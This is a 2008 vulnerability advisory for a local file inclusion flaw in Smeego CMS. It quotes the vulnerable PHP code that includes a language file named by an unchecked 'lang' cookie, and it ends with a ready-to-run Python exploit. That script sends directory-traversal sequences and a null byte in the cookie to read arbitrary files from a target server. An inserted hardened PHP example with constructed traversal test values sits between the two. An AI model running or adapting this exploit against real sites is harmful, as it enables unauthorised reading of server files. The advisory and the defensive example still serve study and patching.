SECURITYVULNS:DOC:19865
May 20, 2008 - 12:00 a.m.

Smeego CMS vulnerability


Smeego CMS Local File Include Exploit

by

0in from Dark-Coders Programming & Security Group

>>>>>>>> http://dark-coders.4rh.eu <<<<<<<<<<<<<<

#--------------------------------------------------------

Contact: 0in(dot)email[at]gmail(dot)com

#--------------------------------------------------------

Greetings to: Die_Angel,suN8Hclf,m4r1usz,djlinux,doctor

#--------------------------------------------------------

Description:

Smeego is a Content Management System or Portal System written in PHP and designed to be easy to install and use. Smeego has a mature code and comes with cool modules and themes for you to start your own dynamic and database driven website. Bla bla Bla […]

-------------------------------------------------------

Script home: http://smeego.com

-------------------------------------------------------

Vuln:

>>>>>> File: mainfile.php <<<<<<<

if ($display_errors == 1) { // We don't see any errors ;(
    @ini_set('display_errors', 1);
} else {
    @ini_set('display_errors', 0);
}
if (isset($newlang)) {
    if (file_exists("language/lang-".$newlang.".php")) {
        setcookie("lang",$newlang,time()+31536000);
        include_once("language/lang-".$newlang.".php");
        $currentlang = $newlang;
    } else {
        setcookie("lang",$language,time()+31536000);
        include_once("language/lang-".$language.".php");
        $currentlang = $language;
    }
} elseif (isset($lang)) {
    include_once("language/lang-".$lang.".php");
    $currentlang = $lang;
} else {
    setcookie("lang",$language,time()+31536000);
    include_once("language/lang-".$language.".php");
    $currentlang = $language;
}

>>>>>> End <<<<<<<

So… We can send Cookie: lang=[lfi]
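
The elseif (isset($lang)) branch above passes $lang into include_once with no validation at all. A hardened version of that lookup follows as an added example; it is not Smeego's code or the advisory author's. resolve_language() and the temporary demo directory are assumed names, and the cookie values are constructed.

```php
<?php
// Added example, not Smeego code: resolve_language() and the demo
// directory are hypothetical names used only for this illustration.
function resolve_language($requested, $default, $langDir)
{
    // Syntax gate: short names made of a-z, 0-9, "_" or "-" only. This
    // rejects "/", "\", "." and NUL bytes before any filesystem call.
    if (!is_string($requested)
        || !preg_match('/\A[a-z0-9_-]{1,32}\z/', $requested)) {
        return $default;
    }
    // Allowlist: only names of files really present in the language dir.
    $available = array();
    foreach (glob($langDir . '/lang-*.php') ?: array() as $path) {
        $available[] = substr(basename($path, '.php'), strlen('lang-'));
    }
    return in_array($requested, $available, true) ? $requested : $default;
}

// Constructed demo: a temporary language directory with two stub files.
$dir = sys_get_temp_dir() . '/lang-demo-' . getmypid();
if (!is_dir($dir)) {
    mkdir($dir, 0700);
}
foreach (array('english', 'polish') as $name) {
    file_put_contents("$dir/lang-$name.php", "<?php // constructed stub\n");
}

// Constructed cookie values: valid, traversal with NUL, unknown, non-string.
$samples = array('polish', "../../some/file\0", 'klingon', array('x'));
foreach ($samples as $cookie) {
    $currentlang = resolve_language($cookie, 'english', $dir);
    include_once "$dir/lang-$currentlang.php"; // path uses a vetted name only
    echo json_encode($cookie), ' => ', $currentlang, "\n";
}

// Clean up the constructed files.
array_map('unlink', glob("$dir/lang-*.php") ?: array());
rmdir($dir);
```

Only the first sample resolves to its own name; every other value falls back to the default, so the include path is never built from raw cookie data.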

-------------------------------------------------------

Simple Python Exploit:

#!/usr/bin/python
import sys
import time
import httplib
print '====================================================='
print ' Smeego CMS Local File INclude Exploit '
print ' by '
print ' 0in from Dark-Coders Programming & Security Group! '
print ' http://dark-coders.4rh.eu '
print '====================================================='
try:
    target=sys.argv[1]
    path=sys.argv[2]
    file=sys.argv[3]
except Exception:
    print '\nUse: %s [target] [path] [file]' % sys.argv[0]
    quit()
i=0
lfi='../'
target+=":80"
special="%00"
file+=special
for i in range(9):
    lfi+="../"
print '---------------------------------------------------------'
mysock=httplib.HTTPConnection(target)
mysock.putrequest("GET",path)
mysock.putheader("User-Agent","Billy Explorer v666")
mysock.putheader('Accept', 'text/html')
mysock.putheader('Accept-Language',' en-us,en;q=0.5')
mysock.putheader('Cookie','lang=%s%s' % (lfi,file))
mysock.endheaders()
reply=mysock.getresponse()
print reply.read()
time.sleep(2)
mysock.close()
print '----------------------------------------------------------'

#EOFF